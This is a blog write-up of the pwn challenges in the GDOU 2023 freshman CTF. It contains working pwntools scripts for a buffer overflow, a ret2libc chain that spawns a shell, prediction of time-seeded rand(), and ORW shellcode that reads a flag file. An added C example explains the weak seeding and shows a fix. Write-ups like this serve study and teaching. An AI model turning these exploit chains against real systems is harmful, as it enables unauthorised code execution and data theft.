Preface
GDOU (海大) freshman contest. The pwn challenges the organisers set really were easy; I don't understand myself why I didn't AK (solve all of them), but in any case the last one did work locally 🥹🥹🥹
As a bonus, at the end there is a web challenge that I stumbled into solving by accident with 2 minutes left before the contest ended.
EASY PWN
Truly easy: nothing to do, just overwrite it directly:
from pwn import *

p = process('./easypwn')
# p = remote('node6.anna.nssctf.cn', 28171)

# 0x1f bytes of filler: fill the buffer and spill over into what sits after it
payload = b'a' * 0x1f
p.sendline(payload)
p.interactive()
Shellcode
NX is enabled, so it's a straightforward ret2libc:
from pwn import *

# p = process('./shellcode')
p = remote('node4.anna.nssctf.cn', 28510)
elf = ELF('./shellcode')
lib = ELF('./libc6_2.27-3ubuntu1_amd64.so')   # libc matching the remote target

pop_rdi = 0x00000000004007b3    # pop rdi ; ret
ret_addr = 0x000000000040028e   # ret, keeps the stack 16-byte aligned before system()
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']

# Stage 1: overflow the buffer (0xa) plus saved rbp (0x8), call puts(puts@GOT)
# to leak the libc address of puts, then return to main for a second overflow
p.sendline(b'aaaa')
payload = b'a' * (0xa + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
base_addr = puts_addr - lib.sym['puts']
print(hex(base_addr))
system_addr = base_addr + lib.sym['system']
binsh_addr = base_addr + next(lib.search(b'/bin/sh'))

# Stage 2: same overflow, now calling system("/bin/sh")
p.sendline(b'aaaa')
payload = b'a' * (0xa + 0x8) + p64(ret_addr) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()
Real Men Go Down 120 Floors (真男人下120层)
Wrapped in a pile of random numbers, but no real difficulty in itself:
from pwn import *
from ctypes import *

# p = process('./bin')
p = remote('node5.anna.nssctf.cn', 28986)
elf = ELF('./bin')

# Load the same libc as the target and replay its seeding: srand(time(0)),
# one rand() call, then a reseed derived from that value
libc = cdll.LoadLibrary('./libc6_2.27-3ubuntu1_amd64.so')
libc.srand(libc.time(0))
v4 = libc.rand()
libc.srand(v4 % 3 - 1522127470)

# Answer all 120 floors with the predicted values
for _ in range(120):
    p.sendline(str(libc.rand() % 4 + 1))
p.interactive()
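Why the replay works, as an added example that is not part of the original write-up: a small C program of my own (not the challenge binary) reproduces the seeding scheme the script above assumes, shows that the whole sequence is regenerated from the start second alone, and puts a getentropy()-based variant beside it. The function names, the 120-floor size and the choice of getentropy() are my assumptions; the constant and the `% 3` / `% 4 + 1` arithmetic come from the script.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/random.h>   /* getentropy(): glibc >= 2.25 */

#define FLOORS 120
/* Seeding as the solve script above replays it: srand(time(0)), one rand(), then
 * a reseed derived from it. Knowing the second the process started in is enough
 * to regenerate all 120 answers; worse, v4 % 3 has only three values, so only
 * three distinct sequences can ever occur. */
void weak_floor_sequence(time_t start_second, int *out, size_t n)
{
    srand((unsigned)start_second);
    int v4 = rand();
    srand((unsigned)(v4 % 3 - 1522127470));
    for (size_t i = 0; i < n; i++)
        out[i] = rand() % 4 + 1;
}

/* Hardened variant (my assumption of a fix): each choice comes from the kernel
 * CSPRNG. 256 % 4 == 0, so reducing a byte mod 4 is unbiased. 0 on success, -1 on error. */
int secure_floor_sequence(int *out, size_t n)
{
    unsigned char buf[256];   /* getentropy() caps one call at 256 bytes */
    if (n > sizeof buf || getentropy(buf, n) != 0)
        return -1;
    for (size_t i = 0; i < n; i++)
        out[i] = buf[i] % 4 + 1;
    return 0;
}

int sequences_match(const int *a, const int *b, size_t n)
{
    return memcmp(a, b, n * sizeof *a) == 0;
}

int main(void)
{
    int game[FLOORS], replay[FLOORS], hardened[FLOORS];
    time_t now = time(NULL);
    weak_floor_sequence(now, game, FLOORS);    /* what the program would ask for */
    weak_floor_sequence(now, replay, FLOORS);  /* predicted from the same second */
    printf("time-seeded rand(): replay matches = %d\n", sequences_match(game, replay, FLOORS));
    if (secure_floor_sequence(hardened, FLOORS) == 0)
        printf("getentropy(): first answers %d %d %d\n", hardened[0], hardened[1], hardened[2]);
    return 0;
}
```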
Random
It's called Random, but it is really a shellcode challenge with a sandbox enabled: do a stack pivot and write in ORW (open/read/write) shellcode. This was the first time I hand-wrote part of the shellcode myself; unfortunately it didn't work on the remote:
from pwn import *
from ctypes import *

context(arch='amd64')
p = process('./RANDOM')
# p = remote('node6.anna.nssctf.cn', 28599)
elf = ELF('./RANDOM')

# Pass the time-seeded rand() check by replaying it with the local libc
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
p.sendline(str(libc.rand() % 50))

haha_addr = 0x40094A

# ORW shellcode (0x20 bytes): push "flag" onto the stack and open() it
# (rsi is cleared to O_RDONLY by the stub below), read() the file onto the
# stack with the large count still in rdx, then write() it to stdout:
# edi holds the fd, and fd 3 ^ 2 == 1
shellcode1 = asm('''
mov edx,0x67616c66
push rdx
mov rdi,rsp
mov eax,2
syscall
mov edi,eax
mov rsi,rsp
xor eax,eax
syscall
xor edi,2
mov eax,edi
syscall
''')
# Stub (8 bytes) that runs first: clear esi, move rsp back by 0x28 to the start
# of shellcode1 and jump there
shellcode2 = asm("""
xor esi,esi
sub rsp,0x28
jmp rsp
""")
print(len(shellcode1))
print(len(shellcode2))
payload = shellcode1 + shellcode2 + p64(haha_addr)
p.sendline(payload)
p.interactive()
hate eat snake
A web challenge, and a hilarious one. Because RANDOM had made this blogger angry, I set out to take on the 60-second challenge; naturally, clumsy-handed as I am, I couldn't do it. But then I was pleasantly surprised to find that after the snake dies, the timer keeps counting if you just leave it there, so I waited out the 60 seconds and picked up a flag 🥵🤗💥💖
- THE END -
Last modified: 30 July 2023
Unless otherwise stated, all posts on this blog are the blogger's original work.
If you repost, please cite the source: https://he.tld1027.com/2023/04/16/gdou2023-pwn%e9%83%a8%e5%88%86wp/